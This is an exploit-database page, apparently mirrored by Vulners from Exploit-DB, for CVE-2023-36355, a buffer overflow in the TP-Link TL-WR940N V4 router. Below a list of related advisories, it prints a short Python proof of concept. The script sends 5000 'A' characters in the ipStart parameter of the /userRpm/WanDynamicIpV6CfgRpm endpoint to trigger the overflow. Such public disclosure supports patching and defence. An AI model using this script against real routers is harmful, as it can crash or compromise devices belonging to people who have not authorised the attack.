Lucene search
K

TP-Link TL-WR940N V4 - Buffer OverFlow

🗓️ 03 Jul 2023 00:00:00Reported by Amirhossein BahramizadehType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 230 Views

TP-Link TL-WR940N V4 Buffer Overflow Hardware Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
TP-Link TL-WR940N V4 - Buffer OverFlow Exploit
4 Jul 202300:00
zdt
ATTACKERKB
CVE-2023-36355
22 Jun 202320:15
attackerkb
CNNVD
TP-Link TL-WR940N 安全漏洞
22 Jun 202300:00
cnnvd
CVE
CVE-2023-36355
22 Jun 202300:00
cve
Cvelist
CVE-2023-36355
22 Jun 202300:00
cvelist
NVD
CVE-2023-36355
22 Jun 202320:15
nvd
Packet Storm
TP-Link TL-WR940N 4 Buffer Overflow
3 Jul 202300:00
packetstorm
Prion
Buffer overflow
22 Jun 202320:15
prion
Positive Technologies
PT-2023-3441 · Tp Link · Tp-Link Tl-Wr940N
20 Jun 202300:00
ptsecurity
Vulnrichment
CVE-2023-36355
22 Jun 202300:00
vulnrichment
Rows per page
# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000  # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
    print('Buffer overflow triggered successfully')
else:
    print('Buffer overflow not triggered')

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation